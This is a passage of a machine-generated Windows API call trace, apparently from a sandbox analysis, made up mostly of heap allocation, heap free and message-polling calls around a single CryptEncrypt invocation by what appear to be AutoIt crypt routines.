wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.259] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0268.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0268.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.262] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.262] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.262] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.263] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0268.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.263] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e80 [0268.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.265] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x67fb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6800) returned 1 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0268.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0268.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0268.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.272] RtlAllocateHeap 